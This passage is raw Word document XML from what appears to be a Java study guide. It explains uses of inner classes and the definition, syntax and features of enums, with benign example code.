      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ActionEvent</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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98A47D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Button clicked!"</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F40BBC"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65916B" w14:textId="0B57C6CC"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9261CD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ion and Traversing Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562E2FE3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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can be used to implement </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>iterators</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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42B604C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Collection</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5F7B14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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> data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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1</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2</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3</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4</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p>
    <w:p w14:paraId="5A5858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A3FFFE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4480A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index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6AD7AB5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6ED51DD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boolean</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> has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0E7B1D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index </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;</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length</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539DE64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994BC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72FDDA6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nteger</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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FAF8C1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index</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9E018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4AD9A9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30F968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80F6BF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getIterato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AD231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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57291E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5F766F" w14:textId="01B5C9CA"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1ABC4FB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mproving Readability and Maintainability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454BBF5B"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inner classes helps improve the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ility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the code by logically grouping related classes together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F8DAA8"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so reduces clutter by not exposing the inner class to the external world if it is not needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E91548"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Adapter and Strategy Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2321D" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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certain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>design patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as </w:t>
      </w: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ategy patterns</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, where a behavior or strategy can be defined within a class that is used only by the outer class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA95CE6"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 (Strategy Pattern):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFC71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tex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6B5C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lastRenderedPageBreak/>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266C5AA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25DEA15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etStrategy</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</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8E07D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this</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">strategy </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</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0733754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C27B04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79A2CBE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574CED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execute</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2F958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5880E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0FB1340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interfac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C259E2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p>
    <w:p w14:paraId="6A31EF9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8C0C25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35EBE7E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creteStrategyA</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62B9B0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E616E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Executing strategy A"</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A90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75D7CD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5E1160A" w14:textId="5C6841D0"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235A59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elper and Utility Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1EA7B7" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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often used as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>help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tility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> classes within a larger class. These classes are used to perform specific tasks that are needed only within the outer class, and they do not need to be exposed to other classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614D5BE"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Threading and Runnable Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1858D80E" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="001E4882">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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unnable tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when the task is tightly coupled with the outer class and needs to access the outer class’s data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236558A5"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27ED39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OuterClass</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B318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count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3BB2FF0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5CEEFF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w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Thread</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7BFFAF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run</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B0C00F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f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0088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i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r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&l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r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</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68CF9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count</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394365C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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>count</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3F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14059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5288B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F7EF53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249334E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tartThread</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E6037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thread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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C452B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thread</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidRPr="0023650C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5499786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5EBF1BC" w14:textId="5CD37E1B"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0EAF9D22"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nonymous Inner Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022BE697"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used when you need to create an instance of a class that implements an interface or extends a class and you don’t want to create a separate named class for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939DC09"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seen in frameworks or libraries where you can pass behavior (such as event listeners) directly as parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBB336A"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B05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purpose of inner classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE7F1C7" w14:textId="36A03954" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="006513B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc197867268"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Enum? Write a syntax for enum</w:t>
      </w:r>
      <w:r w:rsidR="00946676" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="19925C5E" w14:textId="6E5C7E04" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205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Enums:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F66803"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safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enums provide type safety by ensuring that only valid constants are used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F011575"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et of constants</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Once an enum is defined, it cannot have additional values added to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0DF3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s can have fields, methods, and constructors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A096F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java.lang.Enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: All enums implicitly extend java.lang.Enum, and thus they inherit methods like ordinal(), name(), and values().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CCC5A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Enum in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C80A9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basic syntax for defining an enum in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4AF1D6"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EnumName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692C74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ANT1, CONSTANT2, CONSTANT3; // List of enum constants</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6976E52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42A719"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Enum in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451122F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num to represent Days of the Week</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D76BF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F961D4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 MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEE15F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CE8C03" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22DE27A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3FA4265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75F5D9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4096A4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6E3D2DBA" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C102FE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enum constant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540BA4F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC35F1B" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B24796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enum with switch statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31535D0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today) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623ECB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MONDAY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D244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rt of the week!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A4FAE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2B3949B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FRIDAY:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCE430E"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eekend is near!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF4B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53BB78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2EFCE83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other day!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765AA4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2430C6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3FFA1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69944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694412"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8656B2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CCF1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of the week!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324EA558"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um with Fields and Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E29FD0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can also have fields, constructors, and methods to store additional information or perform specific operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDDE4F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AA6B52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Weekend"), MONDAY("Weekday"), TUESDAY("Weekday"), WEDNESDAY("Weekday"),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387F3F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URSDAY("Weekday"), FRIDAY("Weekday"), SATURDAY("Weekend");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BF77A3" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405D6BB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type; // Field to store the type of day (Weekend/Weekday)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFA8B4C" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BEBC7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onstructor to initialize the type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850597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String type) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D846A2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type = type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE9C1D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BE6D95" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="617EDF7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type of day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4FDF7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Type() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223D1FD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type;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB50C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A0D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07BF01" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="693768F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0DC2E99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88AE4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 and its method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B92EB3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2E56FF9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 + " and it is a " + today.getType());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A971BF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17C4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4CF5FC1"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9926A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 and it is a Weekday</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786C058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31D8687" w14:textId="77777777" w:rsidR="00F23F73" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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s are implicitly public, static, and final</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You cannot subclass enums.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE8890F" w14:textId="38A613A6" w:rsidR="00342FA5" w:rsidRPr="00CE4B95" w:rsidRDefault="00F23F73" w:rsidP="00C205E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40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Enums are a great way to ensure type safety</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and they provide built-in methods like values(), ordinal(), and valueOf().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B85514" w14:textId="2E22089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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADE385D" w14:textId="05D9F20B" w:rsidR="00946676" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc197867269"/>
